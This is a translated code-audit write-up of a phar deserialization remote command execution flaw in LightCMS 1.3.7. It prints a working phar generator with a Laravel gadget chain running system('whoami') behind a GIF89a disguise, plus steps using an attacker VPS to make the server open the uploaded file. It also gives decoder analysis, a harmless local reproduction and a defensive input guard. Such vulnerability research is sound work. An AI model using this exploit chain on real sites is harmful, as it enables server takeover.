[PHP Code Audit] Command execution vulnerability in LightCMS 1.3.7
Posted by Y4tacker
Editor's note: this article was compiled by 小常识网 (cha138.com) and covers the command execution vulnerability in LightCMS 1.3.7 found during a PHP code audit; we hope it is of some reference value.
Preface
I had been meaning to reproduce this for a while and then forgot about it, so I'll catch up on it tonight.
Exploitation
First generate a phar with phpggc, or, if you would rather skip that, use this generator:
<?php
// Run with: php -d phar.readonly=0 gen.php
// (phar.readonly defaults to On, which blocks creating archives.)
// Stand-ins for the Laravel classes: only the class names and property
// names matter, because they are what ends up in the serialized metadata.
namespace Illuminate\Broadcasting {
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct($events, $event)
        {
            $this->events = $events;
            $this->event = $event;
        }
    }
    class BroadcastEvent
    {
        protected $connection;
        public function __construct($connection)
        {
            $this->connection = $connection;
        }
    }
}
namespace Illuminate\Bus {
    class Dispatcher
    {
        protected $queueResolver;
        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }
    }
}
namespace {
    // Chain: PendingBroadcast::__destruct() -> Dispatcher::dispatch($event)
    // -> dispatchToQueue() -> call_user_func($queueResolver, $command->connection),
    // which here is system('whoami').
    $command = new Illuminate\Broadcasting\BroadcastEvent('whoami');
    $dispatcher = new Illuminate\Bus\Dispatcher("system");
    $pendingBroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispatcher, $command);
    $phar = new Phar('phar.phar');           // Phar needs a .phar name to create the archive
    $phar->startBuffering();
    // GIF89a in front of the stub so the file passes naive image checks;
    // phar itself only requires __HALT_COMPILER() to be present in the stub.
    $phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>");
    $phar->addFromString('test.txt', 'test');
    $phar->setMetadata($pendingBroadcast);   // the payload object lives in the metadata
    $phar->stopBuffering();
    rename('phar.phar', 'phar.jpg');         // the extension is irrelevant to phar://
}
Then upload the file through the admin backend and note the relative path it is stored under.
Then, on your VPS, serve a response whose body is nothing but that path behind the phar:// wrapper, for example
phar://./upload/image/202106/uzOpshR76Znv0gG6mvL9YHBRXPI5EaEDFpwqfgCp.gif
The server fetches the VPS URL and hands the response body to the image decoder, which treats the string as a location to read (see the analysis below). Finally send the request; the command executes.
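The steps above, reproduced locally as an added example that is not code from the original post or from LightCMS: it builds the same GIF89a-stubbed phar, renames it to .gif, and then does to the phar:// string exactly what the server-side decoder does with a fetched body, a plain file_get_contents(). A hypothetical class Probe stands in for the Laravel gadget chain and only records that it was unserialized, so nothing is executed. It assumes PHP 7.x run with phar.readonly=0; from PHP 8.0 the phar wrapper no longer unserializes metadata automatically when an archive is opened.

```php
<?php
// Added example, not from the original post: local reproduction of the
// phar:// trigger without Laravel. Run with:
//   php -d phar.readonly=0 phar_trigger.php
// Needs PHP 7.x (PHP 8.0+ stops auto-unserializing phar metadata on open).

class Probe
{
    public $tag;
    public static $woken = [];

    public function __construct(string $tag)
    {
        $this->tag = $tag;
    }

    // Runs inside unserialize(), i.e. while the phar wrapper parses the
    // manifest. Real chains (Laravel's PendingBroadcast) use __destruct,
    // which runs when the object is released, at the latest at shutdown.
    public function __wakeup()
    {
        self::$woken[] = $this->tag;
    }
}

// Same construction as the generator above: GIF89a in front of the stub so
// the file passes naive image checks, payload object in the metadata.
function buildPhar(string $finalPath, $payload): void
{
    $tmp = $finalPath . '.phar';          // Phar needs a .phar name to create
    @unlink($tmp);
    @unlink($finalPath);
    $phar = new Phar($tmp);
    $phar->startBuffering();
    $phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>");
    $phar->addFromString('test.txt', 'test');
    $phar->setMetadata($payload);
    $phar->stopBuffering();
    rename($tmp, $finalPath);             // extension is irrelevant to phar://
}

// What the server does with the fetched body: AbstractDecoder::initFromUrl()
// calls file_get_contents() on the string. Returns true if the metadata
// object was unserialized as a side effect of that single file operation.
function pharWrapperUnserializes(string $pharPath): bool
{
    $before = count(Probe::$woken);
    @file_get_contents('phar://' . $pharPath . '/test.txt');
    return count(Probe::$woken) > $before;
}

$pharFile = __DIR__ . '/probe.gif';      // hypothetical name, any extension works
buildPhar($pharFile, new Probe('metadata'));
echo pharWrapperUnserializes($pharFile) ? "metadata unserialized via phar://\n"
                                        : "no trigger\n";
unlink($pharFile);
```

The point of the Probe class is that the unserialize happens inside the phar wrapper itself, before any inner file is even read; swapping Probe for the PendingBroadcast chain above is the only difference between this script and the real attack.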
Analysis
The vulnerable spot is the same one as the previously disclosed arbitrary file read and RCE: the fetchImageFile function in Http/Controllers/Admin/NEditorController.php. Because the file I supply is not WebP, execution reaches Image::make($data), where $data is the body returned by the fetch. Following that call down leads to the init method in src/Intervention/Image/AbstractDecoder.php:
public function init($data)
{
    $this->data = $data;
    switch (true) {
        case $this->isGdResource():
            return $this->initFromGdResource($this->data);
        case $this->isImagick():
            return $this->initFromImagick($this->data);
        case $this->isInterventionImage():
            return $this->initFromInterventionImage($this->data);
        case $this->isSplFileInfo():
            return $this->initFromPath($this->data->getRealPath());
        case $this->isBinary():
            return $this->initFromBinary($this->data);
        case $this->isUrl():
            return $this->initFromUrl($this->data);
        case $this->isStream():
            return $this->initFromStream($this->data);
        case $this->isDataUrl():
            return $this->initFromBinary($this->decodeDataUrl($this->data));
        case $this->isFilePath():
            return $this->initFromPath($this->data);
        // isBase64 has to be after isFilePath to prevent false positives
        case $this->isBase64():
            return $this->initFromBinary(base64_decode($this->data));
        default:
            throw new NotReadableException("Image source not readable");
    }
}
The fetched body is a plain text string, so isBinary() (a finfo check on the buffer) is false and the string falls through to the isUrl branch. Following that branch, initFromUrl() simply calls file_get_contents() on the string; that call goes through PHP's phar:// stream wrapper, which parses the archive and unserializes its metadata, so the phar:// deserialization triggers reliably. Even if the URL filter were to reject the string, the later isFilePath branch's is_file() is another file operation on the same phar:// path and would do the same.
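The fix that follows from this analysis, as an added example that is not LightCMS's or Intervention Image's own code: the decoder will treat any plain string as a URL or file path, so the handler must never pass a fetched body to Image::make() unless the bytes themselves parse as an image. The guard below goes slightly beyond the case on the page by rejecting every stream-wrapper scheme and path-looking body, not just phar://, and by removing the phar wrapper for the request as a second layer. Function names and the sample bodies are hypothetical and constructed here.

```php
<?php
// Added example, not LightCMS's or Intervention Image's own code: a guard
// to run on the fetched response body before it reaches Image::make().

// True only for a body that is image data, never for a path or URL string.
function isSafeImageBody(string $body, int $maxBytes = 8 * 1024 * 1024): bool
{
    if ($body === '' || strlen($body) > $maxBytes) {
        return false;
    }
    // Cheap structural rejects: a stream-wrapper scheme ("phar://", "php://",
    // "file://") or something that looks like a relative or absolute path.
    if (preg_match('#^\s*[a-z][a-z0-9+.\-]*://#i', $body)) {
        return false;
    }
    if (in_array($body[0], ['.', '/', '\\'], true)) {
        return false;
    }
    // Parse the bytes as an image without touching the filesystem or any
    // stream wrapper; a phar:// string or random text fails here.
    $info = @getimagesizefromstring($body);
    if ($info === false) {
        return false;
    }
    $allowed = [IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG, IMAGETYPE_WEBP];
    return in_array($info[2], $allowed, true);
}

// Defence in depth for a handler that never needs phar://: drop the wrapper
// for the rest of the request so even a missed path string cannot reach it.
// Returns true if the wrapper was registered and is now gone.
function disablePharWrapper(): bool
{
    if (!in_array('phar', stream_get_wrappers(), true)) {
        return false;
    }
    return stream_wrapper_unregister('phar');
}

// Constructed inputs: the body the attacker's VPS serves in the write-up,
// an HTML page (a wrong URL), and a real 1x1 transparent GIF.
$samples = [
    'attacker body' => 'phar://./upload/image/202106/x.gif',
    'html page'     => "<html><body>not an image</body></html>",
    '1x1 gif'       => base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'),
];

disablePharWrapper();
foreach ($samples as $name => $body) {
    // Only a body reported as accepted would be handed to Image::make().
    echo str_pad($name, 14), isSafeImageBody($body) ? "accepted\n" : "rejected\n";
}
```

This guard only covers the fetch-by-URL path. The GIF89a-stubbed phar from the generator still lands on disk through the upload handler, which needs its own check, and disabling the phar wrapper is the control that covers both halves of the attack.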